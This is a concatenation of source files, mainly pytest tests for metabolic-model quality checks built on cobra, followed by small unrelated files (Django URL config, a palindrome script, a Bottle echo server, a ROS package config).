@register_with(MODEL_REGISTRY)
def dup_mets_in_c(base):
"""Provide a model with duplicate metabolites in the same compartment"""
met_a = cobra.Metabolite("a_c", compartment="c")
dup_a = cobra.Metabolite("x_c", compartment="c")
not_a = cobra.Metabolite("b_c", compartment="c")
met_a.annotation["inchikey"] = "1231"
met_a.annotation["kegg"] = "123"
dup_a.annotation["inchikey"] = "1231"
dup_a.annotation["kegg"] = "123"
not_a.annotation["inchikey"] = "3211"
not_a.annotation["kegg"] = "321"
met_b = cobra.Metabolite("a_p", compartment="p")
met_c = cobra.Metabolite("a_e", compartment="e")
rxn_a_b = cobra.Reaction("AB")
rxn_a_b.add_metabolites({dup_a: 1, met_a: 1, met_b: -1})
rxn_b_c = cobra.Reaction("BC")
rxn_b_c.add_metabolites({not_a: 1, met_b: 1, met_c: -1})
base.add_reactions([rxn_b_c, rxn_a_b])
return base
@register_with(MODEL_REGISTRY)
def dup_mets_in_c_wrong_annotation(base):
"""Provide a model like `dup_mets_in_c` but with improper annotations"""
met_a = cobra.Metabolite("a_c", compartment="c")
dup_a = cobra.Metabolite("x_c", compartment="c")
not_a = cobra.Metabolite("b_c", compartment="c")
met_a.annotation["kegg"] = "123"
dup_a.annotation["kegg"] = "123"
not_a.annotation["kegg"] = "321"
met_b = cobra.Metabolite("a_p", compartment="p")
met_c = cobra.Metabolite("a_e", compartment="e")
rxn_a_b = cobra.Reaction("AB")
rxn_a_b.add_metabolites({dup_a: 1, met_a: 1, met_b: -1})
rxn_b_c = cobra.Reaction("BC")
rxn_b_c.add_metabolites({not_a: 1, met_b: 1, met_c: -1})
base.add_reactions([rxn_b_c, rxn_a_b])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns(base):
"""Provide a model with duplicate reactions"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
met_a.annotation["inchikey"] = "123"
met_b.annotation["inchikey"] = "456"
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = "HEX"
dup_1.annotation["kegg.reaction"] = "HEX"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_multiple_anns(base):
"""Provide a model like `dup_rxns` but with multiple annotations per rxn"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = "HEX"
rxn_1.annotation["metanetx.reaction"] = "MNXR1"
dup_1.annotation["kegg.reaction"] = "HEX"
dup_1.annotation["metanetx.reaction"] = "MNXR1"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_partial_matching_multiple_anns(base):
"""Provide a model like `dup_rxns_multiple_anns` but with partial matches"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = "HEX"
rxn_1.annotation["metanetx.reaction"] = "MNXR1"
dup_1.annotation["kegg.reaction"] = "HEX"
dup_1.annotation["metanetx.reaction"] = "MNXR2"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_no_matching_multiple_anns(base):
"""Provide a model like `dup_rxns_multiple_anns` but with no matches"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = "HEX11"
rxn_1.annotation["metanetx.reaction"] = "MNXR11"
dup_1.annotation["kegg.reaction"] = "HEX22"
dup_1.annotation["metanetx.reaction"] = "MNXR22"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_list_anns(base):
"""Provide a model like `dup_rxns` but with list annotations"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = ["HEX11", "HEX22"]
dup_1.annotation["kegg.reaction"] = "HEX22"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_multiple_list_anns(base):
"""Provide a model like `dup_rxns_multiple_anns` but with list anns"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = ["HEX11", "HEX22"]
dup_1.annotation["kegg.reaction"] = ["HEX22", "HEX11"]
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_multiple_list_anns_no_match(base):
"""Provide a model like `dup_rxns_multiple_list_anns` but with no match"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = ["HEX111", "HEX222"]
dup_1.annotation["kegg.reaction"] = ["HEX221", "HEX112"]
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def rxns_no_exchange(base):
"""Provide a model with no exchange reactions"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
rxn_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def rxns_with_two_substrates(base):
"""Provide a model with two substrates that can be taken up"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
met_c = cobra.Metabolite("c_e", compartment="e")
met_d = cobra.Metabolite("d_e", compartment="e")
rxn_1 = cobra.Reaction("rxn1")
rxn_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1])
base.add_boundary(
met_c, type="custom", reaction_id="EX_c", lb=-1000, ub=1000)
base.add_boundary(
met_d, type="custom", reaction_id="EX_d", lb=-1000, ub=1000)
return base
@register_with(MODEL_REGISTRY)
def rxns_with_two_false_substrates(base):
"""Provide a model with two false substrates that cannot be taken up"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
met_c = cobra.Metabolite("c_e", compartment="c")
met_d = cobra.Metabolite("d_e", compartment="c")
rxn_1 = cobra.Reaction("rxn1")
rxn_1.add_metabolites({met_a: -1, met_b: 1})
base.add_reactions([rxn_1])
base.add_boundary(met_c, type="custom", reaction_id="EX_c", lb=1, ub=1000)
base.add_boundary(met_d, type="custom", reaction_id="EX_d", lb=1, ub=1000)
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_compartment(base):
"""Provide a model with identical reactions in different compartments."""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("b_c", compartment="c")
met_c = cobra.Metabolite("a_m", compartment="m")
met_d = cobra.Metabolite("b_m", compartment="m")
met_a.annotation["inchikey"] = "123"
met_b.annotation["inchikey"] = "456"
met_c.annotation["inchikey"] = "123"
met_d.annotation["inchikey"] = "456"
rxn_1 = cobra.Reaction("rxn1")
dup_1 = cobra.Reaction("dup1")
rxn_1.annotation["kegg.reaction"] = "HEX"
dup_1.annotation["kegg.reaction"] = "HEX"
rxn_1.add_metabolites({met_a: -1, met_b: 1})
dup_1.add_metabolites({met_c: -1, met_d: 1})
base.add_reactions([rxn_1, dup_1])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_irrev(base):
"""
Provide a model with oppositely directional but irreversible reactions.
"""
met_a = cobra.Metabolite("h2o_c", compartment="c")
met_b = cobra.Metabolite("methf_c", compartment="c")
met_c = cobra.Metabolite("5fthf_c", compartment="c")
met_d = cobra.Metabolite("h_c", compartment="c")
met_a.annotation["inchikey"] = "123"
met_b.annotation["inchikey"] = "456"
met_c.annotation["inchikey"] = "789"
met_d.annotation["inchikey"] = "111"
FOMETRi = cobra.Reaction("FOMETRi")
THFAT = cobra.Reaction("THFAT")
FOMETRi.annotation["kegg.reaction"] = "R02300"
FOMETRi.annotation["brenda"] = "2.1.2.10"
THFAT.annotation["kegg.reaction"] = "R02300"
THFAT.annotation["brenda"] = "2.1.2.10"
FOMETRi.add_metabolites({met_c: 1, met_d: 1, met_a: -1, met_b: -1})
THFAT.add_metabolites({met_c: -1, met_d: -1, met_a: 1, met_b: 1})
base.add_reactions([FOMETRi, THFAT])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_rev(base):
"""
Provide a model with oppositely directional but reversible reactions.
"""
met_a = cobra.Metabolite("h2o_c", compartment="c")
met_b = cobra.Metabolite("methf_c", compartment="c")
met_c = cobra.Metabolite("5fthf_c", compartment="c")
met_d = cobra.Metabolite("h_c", compartment="c")
met_a.annotation["inchikey"] = "123"
met_b.annotation["inchikey"] = "456"
met_c.annotation["inchikey"] = "789"
met_d.annotation["inchikey"] = "111"
FOMETRi = cobra.Reaction("FOMETRi", upper_bound=1000, lower_bound=-1000)
THFAT = cobra.Reaction("THFAT", upper_bound=1000, lower_bound=-1000)
FOMETRi.annotation["kegg.reaction"] = "R02300"
FOMETRi.annotation["brenda"] = "2.1.2.10"
THFAT.annotation["kegg.reaction"] = "R02300"
THFAT.annotation["brenda"] = "2.1.2.10"
FOMETRi.add_metabolites({met_c: 1, met_d: 1, met_a: -1, met_b: -1})
THFAT.add_metabolites({met_c: -1, met_d: -1, met_a: 1, met_b: 1})
base.add_reactions([FOMETRi, THFAT])
return base
@register_with(MODEL_REGISTRY)
def dup_rxns_irrev_exchanges(base):
"""
Provide a model with duplicate exchanges.
"""
met_a = cobra.Metabolite("A_c", compartment="c")
met_a.annotation["inchikey"] = "123"
ex1 = cobra.Reaction("ex1", upper_bound=1000, lower_bound=0)
ex2 = cobra.Reaction("ex2", upper_bound=1000, lower_bound=0)
ex1.add_metabolites({met_a: 1})
ex2.add_metabolites({met_a: 1})
base.add_reactions([ex1, ex2])
return base
@register_with(MODEL_REGISTRY)
def identical_genes(base):
"""Provide a model with reactions with identical genes."""
rxn_1 = cobra.Reaction("RXN1")
rxn_1.gene_reaction_rule = 'gene1 or gene2'
rxn_2 = cobra.Reaction("NXR")
rxn_2.gene_reaction_rule = 'gene1 or gene2'
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_2.add_metabolites({met_1: 1, met_2: -1})
base.add_reactions([rxn_1, rxn_2])
return base
@register_with(MODEL_REGISTRY)
def different_genes(base):
"""Provide a model with reactions with different genes."""
rxn_1 = cobra.Reaction("RXN1")
rxn_1.gene_reaction_rule = 'b2912'
rxn_2 = cobra.Reaction("NXR")
rxn_2.gene_reaction_rule = 'b2551'
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_2.add_metabolites({met_1: 1, met_2: -1})
base.add_reactions([rxn_1, rxn_2])
return base
@pytest.mark.parametrize("model, num", [
("empty", 0),
("three_missing", 3),
("three_present", 0)
], indirect=["model"])
def test_metabolites_formula_presence(model, num):
"""Expect all metabolites to have a formula."""
assert len(basic.check_metabolites_formula_presence(model)) == num
@pytest.mark.parametrize("model, num", [
("empty", 0),
("three_missing", 3),
("three_present", 0)
], indirect=["model"])
def test_metabolites_charge_presence(model, num):
"""Expect all metabolites to have a charge."""
assert len(basic.check_metabolites_charge_presence(model)) == num
@pytest.mark.parametrize("model, num", [
("empty", 0),
("gpr_present", 0),
("gpr_missing", 1),
("gpr_missing_with_exchange", 1),
], indirect=["model"])
def test_gene_protein_reaction_rule_presence(model, num):
"""Expect all non-exchange reactions to have a GPR."""
missing_gpr_metabolic_rxns = \
set(
basic.check_gene_protein_reaction_rule_presence(
model
)
).difference(set(model.boundary))
assert len(missing_gpr_metabolic_rxns) == num
@pytest.mark.parametrize("model, coverage", [
pytest.param("empty", 0,
marks=pytest.mark.raises(exception=ValueError)),
("gpr_present", 0.5),
("gpr_present_not_lumped", 1),
], indirect=["model"])
def test_metabolic_coverage(model, coverage):
"""Expect a model to have high metabolic coverage."""
metabolic_coverage = basic.calculate_metabolic_coverage(model)
assert metabolic_coverage >= coverage
@pytest.mark.parametrize("model, num", [
("empty", 0),
("unconstrained_rxn", 0),
("nonzero_constrained_rxn", 1),
("no_nonzero_constrained_rxn", 0),
], indirect=["model"])
def test_find_nonzero_constrained_reactions(model, num):
"""Expect amount of non-zero rxns to be identified correctly."""
nonzero_constrained_rxns = basic.find_nonzero_constrained_reactions(model)
assert len(nonzero_constrained_rxns) == num
@pytest.mark.parametrize("model, num", [
("empty", 0),
("unconstrained_rxn", 0),
("zero_constrained_rxn", 1),
], indirect=["model"])
def test_find_zero_constrained_reactions(model, num):
"""Expect amount of zero-constrained rxns to be identified correctly."""
zero_constrained_rxns = basic.find_zero_constrained_reactions(model)
assert len(zero_constrained_rxns) == num
@pytest.mark.parametrize("model, num", [
("empty", 0),
("unconstrained_rxn", 0),
("irreversible_rxn", 1),
], indirect=["model"])
def test_find_irreversible_reactions(model, num):
"""Expect amount of irreversible rxns to be identified correctly."""
irreversible_rxns = basic.find_irreversible_reactions(model)
assert len(irreversible_rxns) == num
@pytest.mark.parametrize("model, num", [
("empty", 0),
("unconstrained_rxn", 1),
("zero_constrained_rxn", 0),
], indirect=["model"])
def test_find_unconstrained_reactions(model, num):
"""Expect amount of unconstrained rxns to be identified correctly."""
unconstrained_rxns = basic.find_unconstrained_reactions(model)
assert len(unconstrained_rxns) == num
@pytest.mark.parametrize("model, num", [
("ngam_present", 1),
("ngam_and_atpsynthase", 1)
], indirect=["model"])
def test_ngam_presence(model, num):
"""Expect a single non growth-associated maintenance reaction."""
ngam_reaction = basic.find_ngam(model)
assert len(ngam_reaction) == num
@pytest.mark.parametrize("model, boolean", [
("sufficient_compartments", True),
("insufficient_compartments", False)
], indirect=["model"])
def test_compartments_presence(model, boolean):
"""Expect amount of compartments to be identified correctly."""
assert (len(model.compartments) >= 3) == boolean
@pytest.mark.parametrize("model, num", [
("gpr_present", 0),
("gpr_missing", 0),
("gpr_present_complex", 3)
], indirect=["model"])
def test_find_protein_complexes(model, num):
"""Expect the number of reactions to be identified correctly."""
assert len(basic.find_protein_complexes(model)) == num
# TODO: ngam_and_atpsynthase is not a proper positive control test model
# It needs to be replaced with a new test.
@pytest.mark.parametrize("model, num", [
("ngam_and_atpsynthase", 2),
("gpr_missing_with_exchange", 1),
("non_metabolic_reactions", 0)
], indirect=["model"])
def test_find_pure_metabolic_reactions(model, num):
"""Expect amount of metabolic reactions to be identified correctly."""
assert len(basic.find_pure_metabolic_reactions(model)) == num
@pytest.mark.parametrize("model, num", [
("ngam_present", 1),
("ngam_and_atpsynthase", 0),
("non_metabolic_reactions", 0)
], indirect=["model"])
def test_find_constrained_pure_metabolic_reactions(model, num):
"""Expect num of contrained metabolic rxns to be identified correctly."""
pmr = basic.find_pure_metabolic_reactions(model)
contrained_pmr = set(
[rxn for rxn in pmr if basic.is_constrained_reaction(model, rxn)])
assert len(contrained_pmr) == num
@pytest.mark.parametrize("model, num", [
("transport_gpr_constrained", 1),
("transport_gpr", 0),
("ngam_and_atpsynthase", 0)
], indirect=["model"])
def test_find_constrained_transport_reactions(model, num):
"""Expect num of contrained transport rxns to be identified correctly."""
transporters = helpers.find_transport_reactions(model)
constrained_transporters = set(
[rxn for rxn in transporters if basic.is_constrained_reaction(
model, rxn)])
assert len(constrained_transporters) == num
@pytest.mark.parametrize("model, num", [
("reversible_oxygen_flow", 1),
("non_reversible_oxygen_flow", 0),
("transport_gpr", 0)
], indirect=["model"])
def test_find_reversible_oxygen_reactions(model, num):
"""Expect amount of reversible O2 reactions to be identified correctly."""
o2_rxns = basic.find_oxygen_reactions(model)
rev_o2_rxns = [rxn for rxn in o2_rxns if rxn.reversibility]
assert len(rev_o2_rxns) == num
@pytest.mark.parametrize("model, num", [
("sufficient_compartments", 1)
], indirect=["model"])
def test_find_unique_metabolites(model, num):
"""Expect amount of metabolic reactions to be identified correctly."""
assert len(basic.find_unique_metabolites(model)) == num
@pytest.mark.parametrize("model, num", [
("dup_mets_in_c", 1),
("dup_mets_in_c_wrong_annotation", 0),
("gpr_missing", 0)
], indirect=["model"])
def test_find_duplicate_metabolites_in_compartments(model, num):
"""Expect amount of duplicate metabolites to be identified correctly."""
assert len(basic.find_duplicate_metabolites_in_compartments(model)) == num
@pytest.mark.parametrize("model, num", [
("empty", 0),
("dup_rxns", 2),
("dup_rxns_multiple_anns", 2),
("dup_rxns_partial_matching_multiple_anns", 2),
("dup_rxns_list_anns", 2),
("dup_rxns_multiple_list_anns", 2),
("dup_rxns_no_matching_multiple_anns", 0),
("dup_rxns_multiple_list_anns_no_match", 0),
("dup_rxns_compartment", 2),
("dup_rxns_irrev", 2),
("gpr_missing", 0)
], indirect=["model"])
def test_find_reactions_with_partially_identical_annotations(model, num):
"""Expect amount of duplicate reactions to be identified correctly."""
_, total = basic.find_reactions_with_partially_identical_annotations(model)
assert total == num
@pytest.mark.parametrize("model, expected", [
("empty", 0),
("dup_rxns", 2),
("dup_rxns_rev", 0),
("dup_rxns_irrev", 0),
("dup_rxns_compartment", 0),
("dup_rxns_irrev_exchanges", 2),
], indirect=["model"])
def test_find_duplicate_reactions(model, expected):
"""Expect amount of duplicate reactions to be identified correctly."""
_, num = basic.find_duplicate_reactions(model)
assert num == expected
@pytest.mark.parametrize("model, num", [
("empty", 0),
("identical_genes", 2),
("different_genes", 0),
("gpr_missing", 0)
], indirect=["model"])
def test_find_reactions_with_identical_genes(model, num):
"""Expect amount of duplicate reactions to be identified correctly."""
_, total = basic.find_reactions_with_identical_genes(model)
assert total == num
@pytest.mark.parametrize("model, num", [
("transport_gpr", 1)
], indirect=["model"])
def test_check_transport_reaction_gpr_presence(model, num):
"""Expect amount of transport reactions without gpr to be identified."""
assert len(basic.check_transport_reaction_gpr_presence(model)) == num
@pytest.mark.parametrize("model, num", [
("rxns_with_two_substrates", 2),
("rxns_with_two_false_substrates", 0),
("rxns_no_exchange", 0),
], indirect=["model"])
def test_find_medium_metabolites(model, num):
"""Expect amount of medium metabolites be identified."""
assert len(basic.find_medium_metabolites(model)) == num
@pytest.mark.parametrize("model, num", [
("non_metabolic_reactions", 1),
("transport_gpr", 2),
pytest.param("gpr_missing", 2,
marks=pytest.mark.raises(exception=RuntimeError)),
], indirect=["model"])
def test_find_external_metabolites(model, num):
"""Expect a specific number of external metabolites to be found."""
assert len(basic.find_external_metabolites(model)) == num
| 36.319429 | 80 | 0.687128 |
ace8d311a66bd42c1fbc20003aba45d4e63db49e | 525 | py | Python | backend/backend/urls.py | kennyudekwu/dog-breed-classification | 51213ae2b15c4ec7b241c5c83ccd99bf82e7b612 | [
"MIT"
] | null | null | null | backend/backend/urls.py | kennyudekwu/dog-breed-classification | 51213ae2b15c4ec7b241c5c83ccd99bf82e7b612 | [
"MIT"
] | null | null | null | backend/backend/urls.py | kennyudekwu/dog-breed-classification | 51213ae2b15c4ec7b241c5c83ccd99bf82e7b612 | [
"MIT"
] | null | null | null | from django.conf.urls import url
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from api import views
urlpatterns = [
# path('predict', views.result, name="inferece"),
path('admin/', admin.site.urls),
path('frontend/', include('frontend.urls')),
path('api/', include('api.urls'))
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
| 30.882353 | 60 | 0.699048 |
ace8d326ec9119f03c25bcbf877267791bd2bcbe | 501 | py | Python | AlgorithmsPractice/otherQuestion/shopee/isPanlindrome.py | YangXiaoo/NoteBook | 37056acad7a05b876832f72ac34d3d1a41e0dd22 | [
"CNRI-Python",
"RSA-MD",
"CECILL-B"
] | 58 | 2019-03-03T04:42:23.000Z | 2022-01-13T04:36:31.000Z | AlgorithmsPractice/otherQuestion/shopee/isPanlindrome.py | YangXiaoo/NoteBook | 37056acad7a05b876832f72ac34d3d1a41e0dd22 | [
"CNRI-Python",
"RSA-MD",
"CECILL-B"
] | null | null | null | AlgorithmsPractice/otherQuestion/shopee/isPanlindrome.py | YangXiaoo/NoteBook | 37056acad7a05b876832f72ac34d3d1a41e0dd22 | [
"CNRI-Python",
"RSA-MD",
"CECILL-B"
] | 28 | 2019-08-11T01:25:00.000Z | 2021-08-22T06:46:06.000Z | import sys
def getox(num):
"""่ทๅพๅๅ
ญ่ฟๅถ"""
if num == 0:
return [0]
ret = []
while num:
cur = num % 16
ret.append(cur)
num = num // 16
return ret
def isPanlindrome(nums):
"""้ช่ฏๆฏๅฆไธบๅๆไธฒ"""
if nums == nums[::-1]:
return 1
return 0
def solver(num):
"""ๆนๆณๅ
ฅๅฃ"""
ox = getox(num)
ret = isPanlindrome(ox)
return ret
def test():
num = 1
ret = solver(num)
print(ret)
if __name__ == '__main__':
test()
| 13.916667 | 27 | 0.491018 |
ace8d414cf0d138c61ad46b23f549bc2edc4953f | 620 | py | Python | BeautyForMe/beautyforme/accounts/urls.py | YooInKeun/CAU_CSE_Capstone_3 | 51405c4bed2b55661aa0708c8acea17fe72aa701 | [
"MIT"
] | 6 | 2019-12-07T07:30:34.000Z | 2022-01-20T14:26:44.000Z | BeautyForMe/beautyforme/accounts/urls.py | YooInKeun/CAU_CSE_Capstone_3 | 51405c4bed2b55661aa0708c8acea17fe72aa701 | [
"MIT"
] | 9 | 2019-12-28T06:18:53.000Z | 2022-01-13T01:54:21.000Z | BeautyForMe/beautyforme/accounts/urls.py | YooInKeun/CAU_CSE_Capstone_3 | 51405c4bed2b55661aa0708c8acea17fe72aa701 | [
"MIT"
] | 1 | 2020-05-21T15:55:45.000Z | 2020-05-21T15:55:45.000Z | from django.urls import path, include
from django.contrib.auth import views as auth_views
from django.conf.urls import url
from . import views
app_name = 'accounts'
urlpatterns = [
path('login/', views.ConfirmIsValidUserView.as_view(), name='login'),
path('', include('django.contrib.auth.urls')),
path('signup/', views.CreateUserView.as_view(), name='signup'),
path('signup/done/', views.RegisteredView.as_view(), name='create_user_done'),
path('profile/', views.UserProfileView.as_view(), name='profile'),
path('profile/importance/', views.UserImportanceView.as_view(), name='importance'),
] | 38.75 | 87 | 0.722581 |
ace8d42f817e213d4f44bb8483178fb106e81829 | 1,557 | py | Python | ion/agents/platform/rsn/test/test_oms_client.py | ooici/coi-services | 43246f46a82e597345507afd7dfc7373cb346afa | [
"BSD-2-Clause"
] | 3 | 2016-09-20T09:50:06.000Z | 2018-08-10T01:41:38.000Z | ion/agents/platform/rsn/test/test_oms_client.py | ooici/coi-services | 43246f46a82e597345507afd7dfc7373cb346afa | [
"BSD-2-Clause"
] | null | null | null | ion/agents/platform/rsn/test/test_oms_client.py | ooici/coi-services | 43246f46a82e597345507afd7dfc7373cb346afa | [
"BSD-2-Clause"
] | 2 | 2016-03-16T22:25:49.000Z | 2016-11-26T14:54:21.000Z | #!/usr/bin/env python
"""
@package ion.agents.platform.rsn.test.test_oms_client
@file ion/agents/platform/rsn/test/test_oms_client.py
@author Carlos Rueda
@brief Test cases for CIOMSClient. The OMS enviroment variable can be used
to indicate which CIOMSClient will be tested.
"""
__author__ = 'Carlos Rueda'
from pyon.public import log
from ion.agents.platform.rsn.simulator.logger import Logger
Logger.set_logger(log)
from pyon.util.int_test import IonIntegrationTestCase
from ion.agents.platform.rsn.oms_client_factory import CIOMSClientFactory
from ion.agents.platform.rsn.test.oms_test_mixin import OmsTestMixin
from nose.plugins.attrib import attr
import os
@attr('INT', group='sa')
class Test(IonIntegrationTestCase, OmsTestMixin):
"""
The OMS enviroment variable can be used to indicate which CIOMSClient will
be tested. By default, it tests against the simulator, which is launched
as an external process.
"""
@classmethod
def setUpClass(cls):
OmsTestMixin.setUpClass()
if cls.using_actual_rsn_oms_endpoint():
# use FQDM for local host if testing against actual RSN OMS:
cls._use_fqdn_for_event_listener = True
def setUp(self):
oms_uri = os.getenv('OMS', "launchsimulator")
oms_uri = self._dispatch_simulator(oms_uri)
log.debug("oms_uri = %s", oms_uri)
self.oms = CIOMSClientFactory.create_instance(oms_uri)
def done():
CIOMSClientFactory.destroy_instance(self.oms)
self.addCleanup(done)
| 29.377358 | 78 | 0.725112 |
ace8d4583473ec06450cfefaa049eddbabf43625 | 719 | py | Python | testserver.py | shearichard/behave-web-api | b71d62f40ff53332af640f964c57a11fb7c5d668 | [
"MIT"
] | 3 | 2016-03-12T23:31:20.000Z | 2016-03-19T23:24:30.000Z | testserver.py | shearichard/behave-web-api | b71d62f40ff53332af640f964c57a11fb7c5d668 | [
"MIT"
] | 4 | 2017-01-27T15:21:18.000Z | 2021-08-19T12:09:03.000Z | testserver.py | shearichard/behave-web-api | b71d62f40ff53332af640f964c57a11fb7c5d668 | [
"MIT"
] | 3 | 2017-01-18T15:42:08.000Z | 2021-08-18T09:20:04.000Z | import json
from bottle import Bottle, run, request
app = Bottle()
@app.route('/requests/echo', method='ANY')
def echo():
try:
body = request.body.read().decode('utf-8')
except:
body = None
print(request.headers['Content-Type'])
if request.headers['Content-Type'] == 'application/json':
try:
body = json.loads(body)
except:
pass
result = {
'method': request.method,
'headers': dict(request.headers),
'body': body,
'files': [
{'key': key, 'name': request.files[key].raw_filename}
for key in request.files
]
}
return result
run(app, host='localhost', port='5000')
| 19.972222 | 65 | 0.547983 |
ace8d488459b32ae1c2fe216accbbd1dce30d390 | 288 | py | Python | scripts/animation.py | brickbitbot/cheatsheets | c3b4509bf76fc180621ca1e6433d42742a656759 | [
"BSD-2-Clause"
] | 2 | 2021-08-04T09:01:15.000Z | 2021-08-04T18:54:19.000Z | scripts/animation.py | tamtridung/cheatsheets | 2e1d87bd3d03497b335ba5f936102a9fb5e7afac | [
"BSD-2-Clause"
] | 2 | 2021-05-05T01:05:10.000Z | 2021-05-05T01:05:32.000Z | scripts/animation.py | tamtridung/cheatsheets | 2e1d87bd3d03497b335ba5f936102a9fb5e7afac | [
"BSD-2-Clause"
] | 1 | 2022-01-20T12:42:22.000Z | 2022-01-20T12:42:22.000Z | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
T = np.linspace(0,2*np.pi,100)
S = np.sin(T)
line, = plt.plot(T, S)
def animate(i):
line.set_ydata(np.sin(T+i/50))
a=animation.FuncAnimation(
plt.gcf(), animate, interval=5)
# plt.show()
| 22.153846 | 40 | 0.704861 |
ace8d5125f76ec27f4ad14ee3b31ff8b79afed08 | 150 | py | Python | tests/model_control/detailed/transf_Logit/model_control_one_enabled_Logit_Lag1Trend_NoCycle_AR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | null | null | null | tests/model_control/detailed/transf_Logit/model_control_one_enabled_Logit_Lag1Trend_NoCycle_AR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | 1 | 2019-11-30T23:39:38.000Z | 2019-12-01T04:34:35.000Z | tests/model_control/detailed/transf_Logit/model_control_one_enabled_Logit_Lag1Trend_NoCycle_AR.py | jmabry/pyaf | afbc15a851a2445a7824bf255af612dc429265af | [
"BSD-3-Clause"
] | null | null | null | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Logit'] , ['Lag1Trend'] , ['NoCycle'] , ['AR'] ); | 37.5 | 75 | 0.733333 |
ace8d53680ce69fcdfe588ba101ea6f14b00a73d | 510 | py | Python | source/build/turtlebot_pkg/catkin_generated/pkg.develspace.context.pc.py | royeom/Turtlebot_Autorace | 15615b71f6b190e89efd9c9672f1c95d2f598c64 | [
"BSD-3-Clause"
] | null | null | null | source/build/turtlebot_pkg/catkin_generated/pkg.develspace.context.pc.py | royeom/Turtlebot_Autorace | 15615b71f6b190e89efd9c9672f1c95d2f598c64 | [
"BSD-3-Clause"
] | null | null | null | source/build/turtlebot_pkg/catkin_generated/pkg.develspace.context.pc.py | royeom/Turtlebot_Autorace | 15615b71f6b190e89efd9c9672f1c95d2f598c64 | [
"BSD-3-Clause"
] | null | null | null | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/bonobono/catkin_ws/devel/include".split(';') if "/home/bonobono/catkin_ws/devel/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;std_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-loroca_ros_tutorials".split(';') if "-loroca_ros_tutorials" != "" else []
PROJECT_NAME = "turtlebot_pkg"
PROJECT_SPACE_DIR = "/home/bonobono/catkin_ws/devel"
PROJECT_VERSION = "0.0.0"
